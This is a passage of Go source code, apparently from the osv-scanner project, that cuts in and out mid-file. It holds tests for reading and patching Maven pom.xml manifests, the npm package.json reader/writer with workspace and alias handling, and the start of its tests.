"pom.xml")) if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() client, _ := datasource.NewMavenRegistryAPIClient(datasource.MavenRegistry{URL: srv.URL, ReleasesEnabled: true}) mavenRW := MavenReadWriter{MavenRegistryAPIClient: client} got, err := mavenRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if !strings.HasSuffix(got.FilePath, "pom.xml") { t.Errorf("manifest file path %v does not have pom.xml", got.FilePath) } got.FilePath = "" depType := depMgmt.Clone() depType.AddAttr(dep.MavenArtifactType, "pom") depType.AddAttr(dep.Scope, "import") depParent.AddAttr(dep.MavenArtifactType, "pom") var depExclusions dep.Type depExclusions.AddAttr(dep.MavenExclusions, "org.exclude:exclude") want := Manifest{ Root: resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "com.mycompany.app:my-app", }, VersionType: resolve.Concrete, Version: "1.0", }, }, Requirements: []resolve.RequirementVersion{ { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "junit:junit", }, VersionType: resolve.Requirement, Version: "4.12", }, // Type: dep.NewType(dep.Test), test scope is ignored to make resolution work. }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:abc", }, VersionType: resolve.Requirement, Version: "1.0.1", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:no-version", }, VersionType: resolve.Requirement, Version: "2.0.0", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:exclusions", }, VersionType: resolve.Requirement, Version: "1.0.0", }, Type: depExclusions, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, VersionType: resolve.Requirement, Version: "1.2.3", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, VersionType: resolve.Requirement, Version: "2.3.4", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:ddd", }, VersionType: resolve.Requirement, Version: "1.2.3", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:xyz", }, VersionType: resolve.Requirement, Version: "2.0.0", }, Type: depMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:no-version", }, VersionType: resolve.Requirement, Version: "2.0.0", }, Type: depMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:aaa", }, VersionType: resolve.Requirement, Version: "1.1.1", }, Type: depMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:bbb", }, VersionType: resolve.Requirement, Version: "2.2.2", }, Type: depMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:ccc", }, VersionType: resolve.Requirement, Version: "3.3.3", }, Type: depMgmt, }, }, Groups: map[RequirementKey][]string{ mavenReqKey(t, "junit:junit", "", ""): {"test"}, mavenReqKey(t, "org.import:xyz", "pom", ""): {"import"}, }, EcosystemSpecific: MavenManifestSpecific{ Parent: maven.Parent{ ProjectKey: maven.ProjectKey{ GroupID: "org.parent", ArtifactID: "parent-pom", Version: "1.1.1", }, RelativePath: "../parent/pom.xml", }, Properties: []PropertyWithOrigin{ {Property: maven.Property{Name: "project.build.sourceEncoding", Value: "UTF-8"}}, {Property: maven.Property{Name: "maven.compiler.source", Value: "1.7"}}, {Property: maven.Property{Name: "maven.compiler.target", Value: "1.7"}}, {Property: maven.Property{Name: "junit.version", Value: "4.12"}}, {Property: maven.Property{Name: "zeppelin.daemon.package.base", Value: "../bin"}}, {Property: maven.Property{Name: "def.version", Value: "2.3.4"}, Origin: "profile@profile-one"}, }, OriginalRequirements: []DependencyWithOrigin{ { Dependency: maven.Dependency{GroupID: "org.parent", ArtifactID: "parent-pom", Version: "1.1.1", Type: "pom"}, Origin: "parent", }, { Dependency: maven.Dependency{GroupID: "junit", ArtifactID: "junit", Version: "${junit.version}", Scope: "test"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "abc", Version: "1.0.1"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-version"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "exclusions", Version: "1.0.0", Exclusions: []maven.Exclusion{ {GroupID: "org.exclude", ArtifactID: "exclude"}, }}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "xyz", Version: "2.0.0"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-version", Version: "2.0.0"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.import", ArtifactID: "import", Version: "1.0.0", Scope: "import", Type: "pom"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.profile", ArtifactID: "abc", Version: "1.2.3"}, Origin: "profile@profile-one", }, { Dependency: maven.Dependency{GroupID: "org.profile", ArtifactID: "def", Version: "${def.version}"}, Origin: "profile@profile-one", }, { Dependency: maven.Dependency{GroupID: "org.import", ArtifactID: "xyz", Version: "6.6.6", Scope: "import", Type: "pom"}, Origin: "profile@profile-two@management", }, { Dependency: maven.Dependency{GroupID: "org.dep", ArtifactID: "plugin-dep", Version: "2.3.3"}, Origin: "plugin@org.plugin:plugin", }, }, RequirementsForUpdates: []resolve.RequirementVersion{ { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.parent:parent-pom", }, VersionType: resolve.Requirement, Version: "1.1.1", }, Type: depParent, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:import", }, VersionType: resolve.Requirement, Version: "1.0.0", }, Type: depType, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, VersionType: resolve.Requirement, Version: "1.2.3", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, VersionType: resolve.Requirement, Version: "${def.version}", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:xyz", }, VersionType: resolve.Requirement, Version: "6.6.6", }, Type: depType, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.dep:plugin-dep", }, VersionType: resolve.Requirement, Version: "2.3.3", }, }, }, }, } if diff := cmp.Diff(want, got); diff != "" { t.Errorf("Maven manifest mismatch (-want +got):\n%s", diff) } // Re-open the file for writing. df, err = depfile.OpenLocalDepFile(filepath.Join(cwd, "testdata", "maven", "my-app", "pom.xml")) if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() out := new(bytes.Buffer) // There are no patches since we are only testing tabs are not escaped. if err := mavenRW.Write(df, out, Patch{Manifest: &want}); err != nil { t.Fatalf("failed to write Maven pom.xml: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, out.String()) } func TestMavenWrite(t *testing.T) { t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) df, err := depfile.OpenLocalDepFile(filepath.Join(cwd, "testdata", "maven", "my-app", "pom.xml")) if err != nil { t.Fatalf("fail to open file: %v", err) } defer df.Close() in := new(bytes.Buffer) if _, err := in.ReadFrom(df); err != nil { t.Fatalf("failed to read from DepFile: %v", err) } patches := MavenPatches{ DependencyPatches: MavenDependencyPatches{ "": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.0.2", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "no-version", Type: "jar", }, NewRequire: "2.0.1", }: true, }, "management": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "xyz", Type: "jar", }, NewRequire: "2.0.1", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "extra-one", Type: "jar", }, NewRequire: "6.6.6", }: false, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "extra-two", Type: "jar", }, NewRequire: "9.9.9", }: false, }, "profile@profile-one": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.profile", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.2.4", }: true, }, "profile@profile-two@management": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.import", ArtifactID: "xyz", Type: "pom", }, NewRequire: "7.0.0", }: true, }, "plugin@org.plugin:plugin": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.dep", ArtifactID: "plugin-dep", Type: "jar", }, NewRequire: "2.3.4", }: true, }, }, PropertyPatches: MavenPropertyPatches{ "": { "junit.version": "4.13.2", }, "profile@profile-one": { "def.version": "2.3.5", }, }, } out := new(bytes.Buffer) if err := write(in.String(), out, patches); err != nil { t.Fatalf("unable to update Maven pom.xml: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, out.String()) } func TestMavenWriteDM(t *testing.T) { t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) df, err := depfile.OpenLocalDepFile(filepath.Join(cwd, "testdata", "maven", "no-dependency-management.xml")) if err != nil { t.Fatalf("fail to open file: %v", err) } defer df.Close() in := new(bytes.Buffer) if _, err := in.ReadFrom(df); err != nil { t.Fatalf("failed to read from DepFile: %v", err) } patches := MavenPatches{ DependencyPatches: MavenDependencyPatches{ "": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "junit", ArtifactID: "junit", Type: "jar", }, NewRequire: "4.13.2", }: true, }, "parent": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.parent", ArtifactID: "parent-pom", Type: "jar", }, NewRequire: "1.2.0", }: true, }, "management": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.management", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.2.3", }: false, { DependencyKey: maven.DependencyKey{ GroupID: "org.management", ArtifactID: "xyz", Type: "jar", }, NewRequire: "2.3.4", }: false, }, }, } out := new(bytes.Buffer) if err := write(in.String(), out, patches); err != nil { t.Fatalf("unable to update Maven pom.xml: %v", err) } testutility.NewSnapshot().WithCRLFReplacement().MatchText(t, out.String()) } func Test_buildPatches(t *testing.T) { t.Parallel() cwd := testutility.GetCurrentWorkingDirectory(t) parentPath := filepath.Join(cwd, "testdata", "maven", "parent", "pom.xml") depProfileTwoMgmt.AddAttr(dep.MavenArtifactType, "pom") depProfileTwoMgmt.AddAttr(dep.Scope, "import") depParent.AddAttr(dep.MavenArtifactType, "pom") patches := []DependencyPatch{ { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.dep:plugin-dep", }, Type: depPlugin, NewRequire: "2.3.4", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:abc", }, NewRequire: "1.0.2", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:aaa", }, NewRequire: "1.2.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:ddd", }, NewRequire: "1.3.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property", }, NewRequire: "1.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:same-property", }, NewRequire: "1.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:another-property", }, NewRequire: "1.1.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property-no-update", }, NewRequire: "2.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:xyz", }, Type: depMgmt, NewRequire: "2.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:xyz", }, Type: depProfileTwoMgmt, NewRequire: "6.7.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, Type: depProfileOne, NewRequire: "1.2.4", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, Type: depProfileOne, NewRequire: "2.3.5", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.parent:parent-pom", }, Type: depParent, NewRequire: "1.2.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:suggest", }, Type: depMgmt, OrigRequire: "1.0.0", NewRequire: "2.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:override", }, Type: depMgmt, NewRequire: "2.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:no-version", }, Type: depMgmt, NewRequire: "2.0.1", }, } specific := MavenManifestSpecific{ Parent: maven.Parent{ ProjectKey: maven.ProjectKey{ GroupID: "org.parent", ArtifactID: "parent-pom", Version: "1.1.1", }, RelativePath: "../parent/pom.xml", }, Properties: []PropertyWithOrigin{ {Property: maven.Property{Name: "property.version", Value: "1.0.0"}}, {Property: maven.Property{Name: "no.update.minor", Value: "9"}}, {Property: maven.Property{Name: "def.version", Value: "2.3.4"}, Origin: "profile@profile-one"}, {Property: maven.Property{Name: "aaa.version", Value: "1.1.1"}, Origin: "parent@" + parentPath}, }, OriginalRequirements: []DependencyWithOrigin{ { Dependency: maven.Dependency{GroupID: "org.parent", ArtifactID: "parent-pom", Version: "1.2.0", Type: "pom"}, Origin: "parent", }, { Dependency: maven.Dependency{GroupID: "junit", ArtifactID: "junit", Version: "${junit.version}", Scope: "test"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "abc", Version: "1.0.1"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-updates", Version: "9.9.9"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-version"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "property", Version: "${property.version}"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "property-no-update", Version: "1.${no.update.minor}"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "same-property", Version: "${property.version}"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "another-property", Version: "${property.version}"}, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "no-version", Version: "2.0.0"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "xyz", Version: "2.0.0"}, Origin: "management", }, { Dependency: maven.Dependency{GroupID: "org.profile", ArtifactID: "abc", Version: "1.2.3"}, Origin: "profile@profile-one", }, { Dependency: maven.Dependency{GroupID: "org.profile", ArtifactID: "def", Version: "${def.version}"}, Origin: "profile@profile-one", }, { Dependency: maven.Dependency{GroupID: "org.import", ArtifactID: "xyz", Version: "6.6.6", Scope: "import", Type: "pom"}, Origin: "profile@profile-two@management", }, { Dependency: maven.Dependency{GroupID: "org.dep", ArtifactID: "plugin-dep", Version: "2.3.3"}, Origin: "plugin@org.plugin:plugin", }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "ddd", Version: "1.2.3"}, Origin: "parent@" + parentPath, }, { Dependency: maven.Dependency{GroupID: "org.example", ArtifactID: "aaa", Version: "${aaa.version}"}, Origin: "parent@" + parentPath + "@management", }, }, } want := map[string]MavenPatches{ "": { DependencyPatches: MavenDependencyPatches{ "": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.0.2", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "another-property", Type: "jar", }, NewRequire: "1.1.0", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "property-no-update", Type: "jar", }, NewRequire: "2.0.0", }: true, }, "management": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "xyz", Type: "jar", }, NewRequire: "2.0.1", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "no-version", Type: "jar", }, NewRequire: "2.0.1", }: true, { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "override", Type: "jar", }, NewRequire: "2.0.0", }: false, }, "profile@profile-one": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.profile", ArtifactID: "abc", Type: "jar", }, NewRequire: "1.2.4", }: true, }, "profile@profile-two@management": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.import", ArtifactID: "xyz", Type: "pom", }, NewRequire: "6.7.0", }: true, }, "plugin@org.plugin:plugin": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.dep", ArtifactID: "plugin-dep", Type: "jar", }, NewRequire: "2.3.4", }: true, }, "parent": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.parent", ArtifactID: "parent-pom", Type: "pom", }, NewRequire: "1.2.0", }: true, }, }, PropertyPatches: MavenPropertyPatches{ "": { "property.version": "1.0.1", }, "profile@profile-one": { "def.version": "2.3.5", }, }, }, parentPath: { DependencyPatches: MavenDependencyPatches{ "": map[MavenPatch]bool{ { DependencyKey: maven.DependencyKey{ GroupID: "org.example", ArtifactID: "ddd", Type: "jar", }, NewRequire: "1.3.0", }: true, }, }, PropertyPatches: MavenPropertyPatches{ "": { "aaa.version": "1.2.0", }, }, }, } allPatches, err := buildPatches(patches, specific) if err != nil { t.Fatalf("failed to build patches: %v", err) } if diff := cmp.Diff(want, allPatches); diff != "" { t.Errorf("result patches mismatch (-want +got):\n%s", diff) } } func Test_generatePropertyPatches(t *testing.T) { t.Parallel() tests := []struct { s1 string s2 string possible bool patches map[string]string }{ {"${version}", "1.2.3", true, map[string]string{"version": "1.2.3"}}, {"${major}.2.3", "1.2.3", true, map[string]string{"major": "1"}}, {"1.${minor}.3", "1.2.3", true, map[string]string{"minor": "2"}}, {"1.2.${patch}", "1.2.3", true, map[string]string{"patch": "3"}}, {"${major}.${minor}.${patch}", "1.2.3", true, map[string]string{"major": "1", "minor": "2", "patch": "3"}}, {"${major}.2.3", "2.0.0", false, map[string]string{}}, {"1.${minor}.3", "2.0.0", false, map[string]string{}}, } for _, tt := range tests { patches, ok := generatePropertyPatches(tt.s1, tt.s2) if ok != tt.possible || !reflect.DeepEqual(patches, tt.patches) { t.Errorf("generatePropertyPatches(%s, %s): got %v %v, want %v %v", tt.s1, tt.s2, patches, ok, tt.patches, tt.possible) } } } ================================================ FILE: internal/resolution/manifest/npm.go ================================================ package manifest import ( "encoding/json" "fmt" "io" "path/filepath" "slices" "strings" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/tidwall/gjson" "github.com/tidwall/sjson" ) func npmRequirementKey(requirement resolve.RequirementVersion) RequirementKey { // Npm requirements are the uniquely identified by the key in the dependencies fields (which ends up being the path in node_modules) // Declaring a dependency in multiple places (dependencies, devDependencies, optionalDependencies) only installs it once at one version. // Aliases & non-registry dependencies are keyed on their 'KnownAs' attribute. knownAs, _ := requirement.Type.GetAttr(dep.KnownAs) return RequirementKey{ PackageKey: requirement.PackageKey, EcosystemSpecific: knownAs, } } type NpmReadWriter struct{} func (NpmReadWriter) System() resolve.System { return resolve.NPM } type PackageJSON struct { Name string `json:"name"` Version string `json:"version"` // TODO: yarn allows workspaces to be a object OR a list: // https://classic.yarnpkg.com/blog/2018/02/15/nohoist/ Workspaces []string `json:"workspaces"` Dependencies map[string]string `json:"dependencies"` DevDependencies map[string]string `json:"devDependencies"` OptionalDependencies map[string]string `json:"optionalDependencies"` // These fields are currently only used when parsing package-lock.json PeerDependencies map[string]string `json:"peerDependencies"` // BundleDependencies []string `json:"bundleDependencies"` } func (rw NpmReadWriter) Read(f depfile.DepFile) (Manifest, error) { dec := json.NewDecoder(f) var packagejson PackageJSON if err := dec.Decode(&packagejson); err != nil { return Manifest{}, err } // Create the root node. manif := newManifest() manif.FilePath = f.Path() manif.Root = resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: packagejson.Name, System: resolve.NPM, }, Version: packagejson.Version, VersionType: resolve.Concrete, }} // Find all package.json files in the workspaces & parse those too. var workspaces []string for _, pattern := range packagejson.Workspaces { match, err := filepath.Glob(filepath.Join(filepath.Dir(f.Path()), pattern, "package.json")) if err != nil { return Manifest{}, err } workspaces = append(workspaces, match...) } // workspaces seem to be evaluated in sorted path order slices.Sort(workspaces) workspaceNames := make(map[string]struct{}) for _, path := range workspaces { wsFile, err := f.Open(path) if err != nil { return Manifest{}, err } defer wsFile.Close() // TODO: Workspaces can't have workspaces of their own. // Avoid attempting to resolve them recursively. m, err := rw.Read(wsFile) if err != nil { return Manifest{}, err } manif.LocalManifests = append(manif.LocalManifests, m) workspaceNames[m.Root.Name] = struct{}{} } isWorkspace := func(req resolve.RequirementVersion) bool { if req.Type.HasAttr(dep.KnownAs) { // "alias": "npm:pkg@*" seems to always take the real 'pkg', // even if there's a workspace with the same name. return false } _, ok := workspaceNames[req.Name] return ok } workspaceReqVers := make(map[resolve.PackageKey]resolve.RequirementVersion) // empirically, the dev version takes precedence over optional, which takes precedence over regular, if they conflict. for pkg, ver := range packagejson.Dependencies { req := rw.makeNPMReqVer(pkg, ver) if isWorkspace(req) { // workspaces seem to always be evaluated separately workspaceReqVers[req.PackageKey] = req continue } manif.Requirements = append(manif.Requirements, req) } for pkg, ver := range packagejson.OptionalDependencies { req := rw.makeNPMReqVer(pkg, ver) req.Type.AddAttr(dep.Opt, "") if isWorkspace(req) { // workspaces seem to always be evaluated separately workspaceReqVers[req.PackageKey] = req continue } idx := slices.IndexFunc(manif.Requirements, func(imp resolve.RequirementVersion) bool { return imp.PackageKey == req.PackageKey }) if idx != -1 { manif.Requirements[idx] = req } else { manif.Requirements = append(manif.Requirements, req) } manif.Groups[npmRequirementKey(req)] = []string{"optional"} } for pkg, ver := range packagejson.DevDependencies { req := rw.makeNPMReqVer(pkg, ver) if isWorkspace(req) { // workspaces seem to always be evaluated separately workspaceReqVers[req.PackageKey] = req continue } idx := slices.IndexFunc(manif.Requirements, func(imp resolve.RequirementVersion) bool { return imp.PackageKey == req.PackageKey }) if idx != -1 { // In newer versions of npm, having a package in both the `dependencies` and `devDependencies` // makes it treated as ONLY a devDependency (using the devDependency version) // npm v6 and below seems to do the opposite and there's no easy way of seeing the npm version :/ manif.Requirements[idx] = req } else { manif.Requirements = append(manif.Requirements, req) } manif.Groups[npmRequirementKey(req)] = []string{"dev"} } resolve.SortDependencies(manif.Requirements) // resolve workspaces after regular requirements for i, m := range manif.LocalManifests { imp, ok := workspaceReqVers[m.Root.PackageKey] if !ok { // The workspace isn't directly used by the root package, add it as a 'requirement' anyway so it's resolved imp = resolve.RequirementVersion{ Type: dep.NewType(), VersionKey: resolve.VersionKey{ PackageKey: m.Root.PackageKey, Version: "*", // use the 'any' specifier so we always match the sub-package version VersionType: resolve.Requirement, }, } } // Add an extra identifier to the workspace package names so name collisions don't overwrite indirect dependencies imp.Name += ":workspace" manif.LocalManifests[i].Root.Name = imp.Name manif.Requirements = append(manif.Requirements, imp) // replace the workspace's sibling requirements for j, req := range m.Requirements { if isWorkspace(req) { manif.LocalManifests[i].Requirements[j].Name = req.Name + ":workspace" reqKey := npmRequirementKey(req) if g, ok := m.Groups[reqKey]; ok { newKey := npmRequirementKey(manif.LocalManifests[i].Requirements[j]) manif.LocalManifests[i].Groups[newKey] = g delete(manif.LocalManifests[i].Groups, reqKey) } } } } return manif, nil } func (rw NpmReadWriter) makeNPMReqVer(pkg, ver string) resolve.RequirementVersion { // TODO: URLs, Git, GitHub, `file:` typ := dep.NewType() // don't use dep.NewType(dep.Dev) for devDeps to force the resolver to resolve them realPkg, realVer := SplitNPMAlias(ver) if realPkg != "" { // This dependency is aliased, add it as a // dependency on the actual name, with the // KnownAs attribute set to the alias. typ.AddAttr(dep.KnownAs, pkg) pkg = realPkg ver = realVer } if strings.Contains(ver, ":") { // TODO: Also check for GitHub URLs - https://docs.npmjs.com/cli/v10/configuring-npm/package-json#github-urls // Unhandled version prefix // e.g. `git+https://...`, `file:...` // TODO: Do a proper match for possibilities: // https://docs.npmjs.com/cli/v10/configuring-npm/package-json#urls-as-dependencies // TODO: resolve the package.json from the file/repo into a local Manifest (and uniquely refer to it somehow) // For now we want to avoid fatal resolution errors. // The resolver fatally errors if the package is not found, but not if the version is not found. // As a hack, assign the name as an alias of a real package, but keep the version invalid/non-existent. typ.AddAttr(dep.KnownAs, pkg) pkg = "-" // This is a real npm package! // TODO: don't add this to the manifest, return some non-fatal errors to surface instead of relying on resolution errors } return resolve.RequirementVersion{ Type: typ, VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: pkg, System: resolve.NPM, }, Version: ver, VersionType: resolve.Requirement, }, } } func (NpmReadWriter) Write(r depfile.DepFile, w io.Writer, patch Patch) error { // Read the whole package.json into a string so we can use sjson to write in-place. var buf strings.Builder _, err := io.Copy(&buf, r) if err != nil { return err } manif := buf.String() for _, changedDep := range patch.Deps { name := changedDep.Pkg.Name origVer := changedDep.OrigRequire newVer := changedDep.NewRequire if knownAs, ok := changedDep.Type.GetAttr(dep.KnownAs); ok { // reconstruct alias versioning origVer = fmt.Sprintf("npm:%s@%s", name, origVer) newVer = fmt.Sprintf("npm:%s@%s", name, newVer) name = knownAs } // Don't know what kind of dependency this is, so check them all. // Check them in dev -> optional -> prod because that's the order npm seems to use when they conflict. // Check devDependency first because npm>=7 uses only the devDependency if it exists in both. alreadyMatched := false depStr := "devDependencies." + name if res := gjson.Get(manif, depStr); res.Exists() { if res.Str != origVer { panic("original dependency version does not match what is in package.json") } alreadyMatched = true manif, err = sjson.Set(manif, depStr, newVer) if err != nil { return err } } depStr = "optionalDependencies." + name if res := gjson.Get(manif, depStr); res.Exists() { if res.Str != origVer { if alreadyMatched { continue } panic("original dependency version does not match what is in package.json") } alreadyMatched = true manif, err = sjson.Set(manif, depStr, newVer) if err != nil { return err } } depStr = "dependencies." + name if res := gjson.Get(manif, depStr); res.Exists() { if res.Str != origVer { if alreadyMatched { continue } panic("original dependency version does not match what is in package.json") } manif, err = sjson.Set(manif, depStr, newVer) if err != nil { return err } } } // Write out modified package.json _, err = io.WriteString(w, manif) return err } // SplitNPMAlias extracts the real package name and version from an alias-specified version. // // e.g. "npm:pkg@^1.2.3" -> name: "pkg", version: "^1.2.3" // // If the version is not an alias specifier, the name will be empty and the version unchanged. func SplitNPMAlias(v string) (name, version string) { if r, ok := strings.CutPrefix(v, "npm:"); ok { if i := strings.LastIndex(r, "@"); i > 0 { return r[:i], r[i+1:] } return r, "" // alias with no version specified } return "", v // not an alias } ================================================ FILE: internal/resolution/manifest/npm_test.go ================================================ package manifest_test import ( "bytes" "reflect" "strings" "testing" "deps.dev/util/resolve" "deps.dev/util/resolve/dep" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/testutility" ) func aliasType(t *testing.T, aliasedName string) dep.Type { t.Helper() var typ dep.Type typ.AddAttr(dep.KnownAs, aliasedName) return typ } func npmVK(t *testing.T, name, version string, versionType resolve.VersionType) resolve.VersionKey { t.Helper() return resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.NPM, Name: name, }, Version: version, VersionType: versionType, } } func npmReqKey(t *testing.T, name, knownAs string) manifest.RequirementKey { t.Helper() var typ dep.Type if knownAs != "" { typ.AddAttr(dep.KnownAs, knownAs) } return manifest.MakeRequirementKey(resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ Name: name, System: resolve.NPM, }, }, Type: typ, }) } func TestNpmRead(t *testing.T) { t.Parallel() df, err := depfile.OpenLocalDepFile("./testdata/package.json") if err != nil { t.Fatalf("failed to open file: %v", err) } defer df.Close() npmRW := manifest.NpmReadWriter{} got, err := npmRW.Read(df) if err != nil { t.Fatalf("failed to read file: %v", err) } if !strings.HasSuffix(got.FilePath, "package.json") { t.Errorf("manifest file path %v does not have package.json", got.FilePath) } got.FilePath = "" want := manifest.Manifest{ Root: resolve.Version{ VersionKey: npmVK(t, "npm-manifest", "1.0.0", resolve.Concrete), }, // npm dependencies should resolve in alphabetical order, regardless of type Requirements: []resolve.RequirementVersion{ // TODO: @babel/core peerDependency currently not resolved { Type: aliasType(t, "cliui"), // sorts on aliased name, not real package name VersionKey: npmVK(t, "@isaacs/cliui", "^8.0.2", resolve.Requirement), }, { // Type: dep.NewType(dep.Dev), devDependencies treated as prod to make resolution work VersionKey: npmVK(t, "eslint", "^8.57.0", resolve.Requirement), }, { Type: dep.NewType(dep.Opt), VersionKey: npmVK(t, "glob", "^10.3.10", resolve.Requirement), }, { VersionKey: npmVK(t, "jquery", "latest", resolve.Requirement), }, { VersionKey: npmVK(t, "lodash", "4.17.17", resolve.Requirement), }, { VersionKey: npmVK(t, "string-width", "^5.1.2", resolve.Requirement), }, { Type: aliasType(t, "string-width-aliased"), VersionKey: npmVK(t, "string-width", "^4.2.3", resolve.Requirement), }, }, Groups: map[manifest.RequirementKey][]string{ npmReqKey(t, "eslint", ""): {"dev"}, npmReqKey(t, "glob", ""): {"optional"}, }, } if !reflect.DeepEqual(got, want) { t.Errorf("npm manifest mismatch:\ngot %v\nwant %v\n", got, want) } } func 